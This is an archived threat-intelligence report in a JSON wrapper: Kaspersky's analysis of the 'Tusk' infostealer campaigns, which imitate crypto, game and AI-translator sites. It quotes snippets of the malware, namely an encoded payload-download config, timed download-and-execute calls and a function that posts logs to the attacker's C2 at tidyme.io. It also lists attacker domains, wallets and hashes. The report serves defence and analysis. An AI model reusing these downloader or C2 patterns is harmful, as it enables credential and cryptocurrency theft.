{
	"id": "229cbc38-7100-4985-9404-d4fd319e98be",
	"created_at": "2026-04-06T00:08:00.811528Z",
	"updated_at": "2026-04-10T03:20:01.609406Z",
	"deleted_at": null,
	"sha1_hash": "7e1ae48e305b41e116009495c08f19a37c4ed125",
	"title": "Tusk: unraveling a complex infostealer campaign",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3144536,
	"plain_text": "Tusk: unraveling a complex infostealer campaign\r\nBy Elsayed Elrefaei\r\nPublished: 2024-08-15 · Archived: 2026-04-05 17:57:47 UTC\r\nSummary\r\nKaspersky Global Emergency Response Team (GERT) has identified a complex campaign, consisting of multiple sub-campaigns orchestrated by Russian-speaking cybercriminals. The sub-campaigns imitate legitimate projects, slightly\r\nmodifying names and branding and using multiple social media accounts to increase their credibility. In our analysis we\r\nobserved that all the active sub-campaigns host the initial downloader on Dropbox. This downloader is responsible for\r\ndelivering additional malware samples to the victim’s machine, which are mostly infostealers (Danabot and StealC) and\r\nclippers. Besides this, the actors use phishing to trick users into providing additional sensitive information, such as\r\ncredentials, which can then be sold on the dark web or used to gain unauthorized access to their gaming accounts and\r\ncryptocurrency wallets and drain their funds directly.\r\nWe identified three active sub-campaigns (at the time of analysis) and 16 inactive sub-campaigns related to this activity. We\r\ndubbed it “Tusk”, as the threat actor uses the word “Mammoth” in log messages of initial downloaders — at least in the\r\nthree active sub-campaigns we analyzed. “Mammoth” is slang used by Russian-speaking threat actors to refer to victims.\r\nMammoths used to be hunted by ancient people and their tusks were harvested and sold.\r\nAnalysis of the inactive sub-campaigns suggests that these are either old campaigns or campaigns that haven’t started yet. In\r\nthis post, we analyze three most recently active sub-campaigns. Here is the timeline for the sub-campaigns in question:\r\nCampaign timeline\r\nFirst sub-campaign (TidyMe)\r\nIn this campaign the actor simulated peerme.io, a platform for the creation and management of decentralized autonomous\r\norganizations (DAOs) on the MultiversX blockchain. It aims to empower crypto communities and projects by providing\r\ntools for governance, funding, and collaboration within a decentralized framework. The malicious website is tidyme[.]io.\r\nFirst sub-campaign: malicious and original sites\r\nAs you can see in the image above, the malicious website contains a “Download” button instead of the “Create your Team\r\nnow” button on the legitimate website. Clicking this button sends a request to the webserver with User-Agent as an\r\nhttps://securelist.com/tusk-infostealers-campaign/113367/\r\nPage 1 of 14\n\nargument. The webserver uses this data to determine which version of the malicious file to send to the victim. The details are\r\nshown in the diagram below:\r\nMalicious webserver routine to download the appropriate malware version depending on the user’s operating system\r\nThis campaign has several malware samples for macOS and Windows, both hosted on Dropbox. In this post we will explore\r\nWindows samples only.\r\nIn addition to distributing malware, this campaign involves victims connecting their cryptocurrency wallets directly through\r\nthe campaign’s website. To investigate further, we created a test wallet with a small balance and linked it to the site.\r\nHowever, no withdrawal transactions were initiated in the course of this study. The purpose of this action was to expose the\r\nthreat actor’s cryptocurrency wallet address for subsequent blockchain analysis.\r\nDuring our investigation, the threat actors transitioned their infrastructure to the domains tidymeapp[.]io and tidyme[.]app.\r\nThe domain tidymeapp[.]io now hosts an updated version of the initial downloader, incorporating additional anti-analysis\r\ntechniques. Despite these changes, its primary objective remains the same: to download and execute subsequent stages.\r\nAnalysis of these new samples is still underway, nevertheless their IoCs are included in the IoCs section in this report.\r\nDetails of the analysis for the previous samples from tidyme[.]io are provided below.\r\nInitial downloader (TidyMe.exe)\r\nThis sample is an Electron application. After its execution, a CAPTCHA form is displayed and the victim must enter the\r\ncode to proceed. No malicious activities will be carried out until the victim passes the CAPTCHA check, suggesting that the\r\nthreat actors added it to prevent execution using automatic dynamic analysis tools (e.g. sandboxes).\r\nCAPTCHA form\r\nIt’s worth mentioning that the CAPTCHA is handled internally in the JavaScript file captcha.js as opposed to being handled\r\nby a third party, which suggests the attackers’ intent of making sure the victim executes the sample.\r\nAfter the user passes the CAPTCHA check, the sample launches the main application interface which resembles a profile\r\npage. But even if the user enters some information here, nothing will happen. At the same time, the sample begins\r\ndownloading the two additional malicious files in the background, which are then executed.\r\nhttps://securelist.com/tusk-infostealers-campaign/113367/\r\nPage 2 of 14\n\nMain interface for TidyMe.exe\r\nDownloader routine\r\nThe tidyme.exe sample contains a configuration file called config.json which contains base64-encoded URLs and a\r\npassword for archived data decompression, which is used to download the second-stage payloads. Here is the content of the\r\nfile:\r\n{\r\n\"archive\": \"aHR0cHM6Ly93d3cuZHJvcGJveC5jb20vc2NsL2ZpL2N3NmpzYnA5ODF4eTg4dHprM29ibS91cGRhdGVsb2FkLnJhcj9ybGtleT04N2\r\n\"password\": \"newfile2024\",\r\n\"bytes\": \"aHR0cDovL3Rlc3Rsb2FkLnB5dGhvbmFueXdoZXJlLmNvbS9nZXRieXRlcy9m\"\r\n}\r\nThe table below lists the decoded URLs:\r\nField\r\nname\r\nDecoded value\r\nArchive\r\nhxxps[:]//www.dropbox[.]com/scl/fi/cw6jsbp981xy88tzk3obm/updateload.rar?\r\nrlkey=87g969em599vnoslcglyo97fa\u0026st=1p7dopsl\u0026dl=1\r\nBytes hxxp[:]//testload.pythonanywhere[.]com/getbytes/f\r\nThe main downloader functionality is stored in preload.js file in two functions, downloadAndExtractArchive and loadFile.\r\nThe function downloadAndExtractArchive retrieves the field archive from the configuration file, which is an encoded\r\nDropbox link, decodes it and stores the file from Dropbox to the path %TEMP%/archive-\u003cRANDOM_STRING\u003e. The\r\ndownloaded file is a password-protected RAR file which will be extracted with the value of the field password in the\r\nconfiguration file, then all .exe files from this archive are executed.\r\nThe loadFile function retrieves the field bytes from the configuration file, decodes it using base64, and sends a GET request\r\nto the resulting URL. The response contains a byte array which will be converted to bytes and written to the path\r\n%TEMP%/\u003cMD5_HASH_OF_CURRENT_TIME\u003e.exe. Following a successful download, this function decodes the\r\nfile, appends 750000000 bytes to its end and then executes it.\r\nThese two functions, in addition to other functions, are exported, which allows the rendering processes to call them in the\r\nfile named script.js with some delay after the user passes the CAPTCHA check. Here is the code responsible for calling\r\nthese functions:\r\nsetTimeout(() =\u003e {\r\nwindow.api.downloadAndExtractArchive()\r\n}, 10000)\r\nhttps://securelist.com/tusk-infostealers-campaign/113367/\r\nPage 3 of 14\n\nsetTimeout(() =\u003e {\r\nwindow.api.loadFile()\r\n}, 100000)\r\n...\r\nIn addition to the two functions above, the sample contains a function called sendRequest. This function is responsible for\r\nsending log messages to the threat actor’s C2 server using HTTP POST messages to the URL\r\nhxxps[:]//tidyme[.]io/api.php. Below is the function’s code:\r\nasync function sendRequest(data) {\r\nconst formData = new URLSearchParams();\r\nObject.entries(data).forEach(([key, value]) =\u003e {\r\nformData.append(key, value);\r\n});\r\nconst response = await fetch('https://tidyme.io/api.php', {\r\nmethod: 'POST',\r\nheaders: {\r\n'Content-Type': 'application/x-www-form-urlencoded',\r\n},\r\nbody: formData,\r\n});\r\nreturn response.json();\r\n}\r\nHere is an example of the data which was passed to the sendRequest function as arguments:\r\nconst { v4: uuidv4 } = require('uuid');\r\nconst randomUUID = uuidv4();\r\nlet data = {\r\nkey: \"aac1ff44\",\r\ntype: \"customlog\",\r\ncode: randomUUID,\r\nmessage: \"Нет действия...\"\r\n};\r\nThe messages sent to the C2 server are in Russian; the table below shows the messages along with the English translation:\r\nOriginal message Translated message\r\nОшибка при создании буфера из архивных данных: Error when creating a buffer from archived data:\r\nНет действия… No action…\r\nСоздаю директорию. I’m creating a directory.\r\nПолучил файл. I received the file.\r\nЗаписал файл в директорию. I wrote the file to the directory.\r\nhttps://securelist.com/tusk-infostealers-campaign/113367/\r\nPage 4 of 14\n\nUnboxing подъехал. Unboxing has arrived.\r\nОткрыл файл. Opened the file.\r\nНе смог открыть файл. Error: Couldn’t open the file. Error:\r\nГлобальная ошибка: Global error:\r\nНет действия… No action…\r\nВыполняю повторный стук. I knock again.\r\nНе удалось получить файл с сайта! Перезапускаюсь. Failed to get file from site! I’m restarting.\r\nФайл успешно записан на устройство. The file was successfully written to the device.\r\nРаздуваю файл. I’m inflating the file.\r\nОткрыл файл. Opened the file.\r\nНеудачное открытие файла, через 4 минуты повторяю…: Unsuccessful file opening, after 4 minutes I repeat…:\r\nГлобальная ошибка: Global error:\r\nМамонт открыл лаунчер… Mammoth opened the launcher…\r\nМамонт свернул лаунчер… Mammoth collapsed the launcher…\r\nМамонт закрыл лаунчер… Mammoth closed the launcher…\r\nThe following diagram shows the download routine for this sample:\r\nInitial downloader routine – TidyMe.exe\r\nIn this campaign, both updateload.exe and bytes.exe are the same file with the following hashes:\r\nMD5: B42F971AC5AAA48CC2DA13B55436C277\r\nSHA1: 5BF729C6A67603E8340F31BAC2083F2A4359C24B\r\nSHA256: C990A578A32D545645B51C2D527D7A189A7E09FF7DC02CEFC079225900F296AC\r\nPayload (updateload.exe and bytes.exe)\r\nThis sample utilizes HijackLoader, a modular loader with different capabilities such as UAC bypass, various process\r\ninjection techniques, and inline API hooking evasion. After updateload.exe (or bytes.exe) is dropped and executed, it starts a\r\nseries of process injections starting with injecting shellcode into cmd.exe, then deletes itself, after which the malicious code\r\ninjected into cmd.exe injects another shellcode into explorer.exe. Both shellcodes are the 32-bit version. As a result of the\r\ninjection chain, the final stage is executed in the context of the explorer.exe process, which is a variant of the infostealer\r\nmalware family StealC. The final payload starts communicating with the threat actor’s C2 server, downloading additional\r\nlegitimate DLLs to be used during the collection and sending of information about the infected system, including the\r\nfollowing:\r\nHWID (unique ID for the infected system calculated by the malware from C drive serial number);\r\nBuild Number (meowsterioland4);\r\nhttps://securelist.com/tusk-infostealers-campaign/113367/\r\nPage 5 of 14\n\nNetwork Info\r\nIP;\r\nCountry;\r\nSystem Summary\r\nHardware ID from the operating system;\r\nOS;\r\nArchitecture;\r\nUsername;\r\nLocal time;\r\nInstalled apps;\r\nAll users;\r\nCurrent user;\r\nProcess list;\r\nScreenshot.\r\nThen it will start requesting configurations from the C2 server, which is a public IP, for the data to be collected. The\r\nfollowing table lists the configurations along with their description:\r\nConfiguration name Description\r\nbrowsers Data to be collected from browsers\r\nplugins Data to be collected from browser extensions\r\nfplugin N/A\r\nwallets Data to be collected for the wallet’s desktop applications\r\nThe diagram below illustrates the execution steps for this sample:\r\nFirst sub-campaign – updateload.exe\r\nIdentifying additional sub-campaigns\r\nHaving completed our analysis of the first sub-campaign, we conducted cyberthreat intelligence (CTI) and OSINT activities\r\naiming to collect as much information as possible related to the threat actor and this specific campaign. Looking at the DNS\r\nrecords for the first campaign (TidyMe), we identified MX records with the value _dc-mx.bf442731a463[.]tidyme[.]io.\r\nResolving this domain to an A record returns the IP 79.133.180[.]213. Utilizing Kaspersky Threat Intelligence Portal (TIP),\r\nwe were able to identify all historical and present domains associated with this IP. Below is a list of all the domains:\r\nDomains\r\ntidyme[.]io\r\nruneonlineworld[.]io\r\nhttps://securelist.com/tusk-infostealers-campaign/113367/\r\nPage 6 of 14\n\nvoico[.]io\r\nastrosounsports[.]shop\r\nbatverssaports[.]shop\r\ndintrinnssports[.]shop\r\ndustfightergame[.]com\r\nedvhukkkmvgcct[.]shop\r\ngurunsmilrsports[.]shop\r\nizxxd[.]top\r\npartyroyale[.]fun\r\npartyroyale[.]games\r\npartyroyaleplay[.]com\r\npartyroyaleplay[.]io\r\nrefvhnhkkolmjbg[.]shop\r\nsinergijiasport[.]shop\r\nsupme[.]io\r\nvinrevildsports[.]shop\r\nwuwelej[.]top\r\nFrom the domains above, only the first three were active during our analysis. We already explored tidyme[.]io, so we’ll\r\ndiscuss the other two active sub-campaigns next.\r\nIn addition to the link between the domains and the IP, all three active campaigns imitate legitimate projects and contain a\r\ndownload link to an initial downloader malware. The diagram below shows the correlation between the different campaigns:\r\nSub-campaigns correlation\r\nSecond sub-campaign (RuneOnlineWorld)\r\nIn this campaign, the threat actor was simulating the website of an MMO game. The original website domain is\r\nriseonlineworld.com, while the malicious website is runeonlineworld[.]io.\r\nhttps://securelist.com/tusk-infostealers-campaign/113367/\r\nPage 7 of 14\n\nSecond sub-campaign: malicious and original sites\r\nThe malicious website contains a download link for the initial downloader, imitating the game launcher. The downloader is\r\nhosted on Dropbox and it follows the same logic described in the TidyMe section (the first sub-campaign) to obtain the\r\nappropriate downloader for the victim’s operating system. The sample name is RuneOnlineWorld.exe.\r\nInitial downloader (RuneOnlineWorld.exe)\r\nThis sample is also an Electron application with mostly the same structure and logic as the initial downloader in the first\r\nsub-campaign. There are different URLs in the configuration file, but otherwise most of the changes involve the main\r\ninterface of the application: it resembles a login page rather than a profile page. Moreover, the login page does actually\r\nprocess the entered data.\r\nFirst, the password is checked for complexity. If the check is passed, the username and password are sent to the C2. Then a\r\nloading page is displayed which is essentially a mockup to give the background tasks enough time to download the\r\nadditional malicious files. The following diagram shows the steps taken by the downloader:\r\nhttps://securelist.com/tusk-infostealers-campaign/113367/\r\nPage 8 of 14\n\nInitial downloader routine – RuneOnlineWorld.exe\r\nFirst payload (updateload.exe)\r\nIn the RuneOnlineWorld campaign the two payloads are no longer the same file. Updateload.exe utilizes HijackLoader and\r\ninjects code to multiple legitimate programs to evade detection. It starts by injecting code into cmd.exe then to explorer.exe.\r\nAfter that, the malicious code injected into explorer.exe starts communicating with multiple C2 servers to download\r\nadditional malicious DLL and MSI files and save them to the path C:\\Users\\\u003cUSERNAME\u003e\\Appdata\\. After downloading\r\nthe malicious files, explorer.exe executes the MSI files using msiexec.exe and the DLL files using rundll32.exe. The final\r\nstage for this sample is multiple infostealers from the malware families Danabot and StealC (injected into explorer.exe).\r\nThe diagram below shows the execution routine for this sample:\r\nSecond sub-campaign – updateload.exe\r\nSecond payload (bytes.exe)\r\nThis sample also uses HijackLoader to evade detection, unpacks different stages of the payload and injects them into\r\nlegitimate processes. First, it creates and injects malicious code into cmd.exe, which injects code into explorer.exe and then\r\ninto OpenWith.exe — a legitimate Windows process. The malicious code injected into OpenWith.exe downloads the next\r\nstage from the threat actor’s C2 (another public IP), decodes it and injects it into another OpenWith.exe instance. In this\r\nstage, the payload downloads six files to the directory %APPDATA%\\AD_Security\\ and creates a scheduled task named\r\nFJ_load which will execute the file named madHcCtrl.exe at login for persistence. Here is a list of files downloaded by\r\nthis stage:\r\nAll of these DLL and EXE files are legitimate, except madHcNet32.dll. The malicious files wickerwork.indd and\r\nbufotenine.yml contain encrypted data.\r\nThe following diagram shows the steps taken by this sample to extract the final payload:\r\nhttps://securelist.com/tusk-infostealers-campaign/113367/\r\nPage 9 of 14\n\nSecond sub-campaign – bytes.exe\r\nmadHcNet32.dll\r\nmadHcCtrl.exe loads and executes madHcNet32.dll, which, in turn, utilizes HijackLoader to extract and execute the final\r\npayload. After execution, madHcCtrl.exe injects the next stage to cmd.exe, then the final stage is injected to explorer.exe.\r\nThe final payload is clipper malware written in GO. This sample is based on open-source clipper malware. The following\r\ndiagram shows the execution steps for this sample:\r\nSecond sub-campaign – madHcNet32.dll\r\nThe clipper monitors the clipboard data. If a cryptocurrency wallet address is copied to the clipboard, it substitutes it with\r\nthe following one:\r\nBTC: 1DSWHiAW1iSFYVb86WQQUPn57iQ6W1DjGo\r\nIn addition, the sample contains unique strings such as the ones below:\r\nC:/Users/Helheim/\r\nC:/Users/Helheim/Desktop/clipper no autorun/mainTIMER.go\r\nWhile searching for samples that contain the same strings, we identified additional samples with different wallet addresses:\r\nETH: 0xaf0362e215Ff4e004F30e785e822F7E20b99723A\r\nBTC: bc1qqkvgqtpwq6g59xgwr2sccvmudejfxwyl8g9xg0\r\nWe identified some transactions on the second and third wallet addresses. There were no transactions related to the first\r\nwallet address at the time of writing this post.\r\nThe second wallet was seen active from March 4 to July 31 and received a total of 9.137 ETH. The third one was active\r\nbetween April 2 and August 6 with 0.0209 BTC received in total. Note that these addresses were only observed in the\r\nclipper malware. This campaign also utilizes infostealers to steal software-based cryptocurrency wallets which could be used\r\nto gain access to the victim’s funds, although we have not seen such activity. In addition, the infostealers collect credentials\r\nfrom browsers and other sources which could allow the threat actor to gain access to other services used by the victim (e.g.\r\nonline banking systems) or sell the stolen data on the dark web.\r\nThird sub-campaign (Voico)\r\nIn this campaign, the threat actor was simulating an AI translator project named YOUS. The original website is yous.ai,\r\nwhile the malicious website is voico[.]io:\r\nhttps://securelist.com/tusk-infostealers-campaign/113367/\r\nPage 10 of 14\n\nThird sub-campaign: malicious and original sites\r\nJust like the previous two sub-campaigns, the malicious website contains a download link for the initial downloader\r\nimitating the application. The downloader is hosted on Dropbox and follows the same logic described in the first sub-campaign to download the appropriate downloader for the victim’s operating system. During our investigation, the malicious\r\nwebsite of this campaign ceased to exist. The sample name is Voico.exe.\r\nInitial downloader (Voico.exe)\r\nThis sample is also an Electron application with mostly the same structure as the initial downloaders in the previous two\r\nsub-campaigns. The downloader logic also remains the same. Most of the changes involve the main interface of the\r\napplication, and different URLs are contained in the configuration file.\r\nVoico.exe main interface\r\nIn addition to these changes, the sample prompts the victim to fill in a registration form, which doesn’t send the data to the\r\nC2. Instead, it passes the user’s credentials to the console.log() function:\r\n// Теперь вы можете использовать эти значения для дальнейшей обработки или отправки на сервер\r\n// \u003cTranslation\u003e: Now you can use these values for further processing or sending to the server\r\nconsole.log('Name:', name);\r\nconsole.log('Username:', username);\r\nconsole.log('Native Language:', nativeLanguage);\r\nconsole.log('Voice:', voice);\r\nconsole.log('Password:', password);\r\nThe following diagram shows the execution routine for this sample:\r\nhttps://securelist.com/tusk-infostealers-campaign/113367/\r\nPage 11 of 14\n\nVoico.exe execution routine\r\nBoth samples in this campaign (updateload.exe and bytes.exe) have very similar behavior to the updateload.exe sample\r\nfrom the second sub-campaign.\r\nPayload (updateload.exe and bytes.exe)\r\nThese samples have similar behavior as the updateload.exe sample from the second sub-campaign with one difference: the\r\nStealC malware downloaded by them communicates to a different C2 server. Other than that, the whole routine from the\r\nupdateload.exe and bytes.exe execution to the final payload execution is the same. Here is a diagram of the execution\r\nroutine for these samples:\r\nThird sub-campaign – updateload.exe \u0026 bytes.exe\r\nPossible other sub-campaigns\r\nDuring the analysis of this campaign, the analyzed samples were hosted at the following paths on the attacker website:\r\nhttp[:]//testload.pythonanywhere.com/getbytes/f and http[:]//testload.pythonanywhere.com/getbytes/m. We didn’t find any\r\nother resources used in the current sub-campaigns (which doesn’t mean they won’t appear in the future). However, we\r\nnoticed other samples hosted in different paths, unrelated to the ongoing sub-campaigns. The following is a list of paths on\r\nthe PythonAnywhere website where these samples are hosted:\r\nhttp[:]//testload.pythonanywhere.com/getbytes/s\r\nhttp[:]//testload.pythonanywhere.com/getbytes/h\r\nThe hashes of the files in the new paths are already included in the IoCs list below.\r\nhttps://securelist.com/tusk-infostealers-campaign/113367/\r\nPage 12 of 14\n\nConclusion\r\nThe campaign uncovered in this report demonstrate the persistent and evolving threat posed by cybercriminals who are\r\nadept at mimicking legitimate projects to deceive victims. By exploiting the trust users place in well-known platforms, these\r\nattackers effectively deploy a range of malware designed to steal sensitive information, compromise systems, and ultimately\r\nachieve financial gain.\r\nThe reliance on social engineering techniques such as phishing, coupled with multistage malware delivery mechanisms,\r\nhighlights the advanced capabilities of the threat actors involved. Their use of platforms like Dropbox to host initial\r\ndownloaders, alongside the deployment of infostealer and clipper malware, points to a coordinated effort to evade detection\r\nand maximize the impact of their operations. The commonalities between different sub-campaigns and the shared\r\ninfrastructure across them further suggests a well-organized operation, potentially tied to a single actor or group with\r\nspecific financial motives. Our detailed analysis of the three active sub-campaigns, from the initial downloader routines to\r\nthe final payloads, reveals a complex chain of attacks designed to penetrate both Windows and macOS environments.\r\nIn addition to the active sub-campaigns, the discovery of 16 inactive sub-campaigns highlights the dynamic and adaptable\r\nnature of the threat actor’s operations. These inactive sub-campaigns, which may represent either older campaigns that have\r\nbeen retired or new ones that have not yet been launched, illustrate the threat actor’s ability to rapidly create and deploy new\r\nmalicious operations, targeting trending topics at the time of campaign. This rapid turnover suggests a well-resourced and\r\nagile adversary, capable of quickly shifting tactics and infrastructure to avoid detection and maintain the effectiveness of\r\ntheir campaigns. The presence of these dormant campaigns also indicates that the threat actor is likely to continue evolving\r\ntheir strategies, potentially reactivating these sub-campaigns or launching entirely new ones in the near future. This\r\nreinforces the need for continuous monitoring and proactive defense strategies to stay ahead of these evolving threats.\r\nIf your company has experienced a cybersecurity incident that requires an immediate response, contact Kaspersky Incident\r\nResponse service.\r\nIndicators of Compromise\r\nURLs to third party services\r\nNetwork IoCs\r\nHost IoCs\r\nHashes for malicious files\r\nHashes for legitimate files used in the campaigns\r\nSHA256\r\n69A90665113BD73B30360D87F7F6ED2C789A90A67F3B6E86474E21273A64F699\r\nB7D3BC460A17E1B43C9FF09786E44EA4033710538BDB539400B55E5B80D0B338\r\n0891EDB0CC1C0208AF2E4BC65D6B5A7160642F89FD4B4DC321F79D2B5DFC2DCC\r\n9D8547266C90CAE7E2F5F5A81AF27FB6BC6ADE56A798B429CDB6588A89CEC874\r\n7D42E121560BC79A2375A15168AC536872399BF80DE08E5CC8B3F0240CDC693A\r\nCE0905A140D0F72775EA5895C01910E4A492F39C2E35EDCE9E9B8886A9821FB1\r\n4C33D4179FFF5D7AA7E046E878CD80C0146B0B134AE0092CE7547607ABC76A49\r\nEA748CAF0ED2AAC4008CCB9FD9761993F9583E3BC35783CFA42593E6BA3EB393\r\n934D882EFD3C0F3F1EFBC238EF87708F3879F5BB456D30AF62F3368D58B6AA4C\r\nAE3CB6C6AFBA9A4AA5C85F66023C35338CA579B30326DD02918F9D55259503D5\r\nCryptocurrency wallet addresses\r\nCrypto Wallet Address\r\nBTC 1DSWHiAW1iSFYVb86WQQUPn57iQ6W1DjGo\r\nBTC bc1qqkvgqtpwq6g59xgwr2sccvmudejfxwyl8g9xg0\r\nETH 0xaf0362e215Ff4e004F30e785e822F7E20b99723A\r\nhttps://securelist.com/tusk-infostealers-campaign/113367/\r\nPage 13 of 14\n\nSource: https://securelist.com/tusk-infostealers-campaign/113367/\r\nhttps://securelist.com/tusk-infostealers-campaign/113367/\r\nPage 14 of 14",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://securelist.com/tusk-infostealers-campaign/113367/"
	],
	"report_names": [
		"113367"
	],
	"threat_actors": [],
	"ts_created_at": 1775434080,
	"ts_updated_at": 1775791201,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/7e1ae48e305b41e116009495c08f19a37c4ed125.pdf",
		"text": "https://archive.orkl.eu/7e1ae48e305b41e116009495c08f19a37c4ed125.txt",
		"img": "https://archive.orkl.eu/7e1ae48e305b41e116009495c08f19a37c4ed125.jpg"
	}
}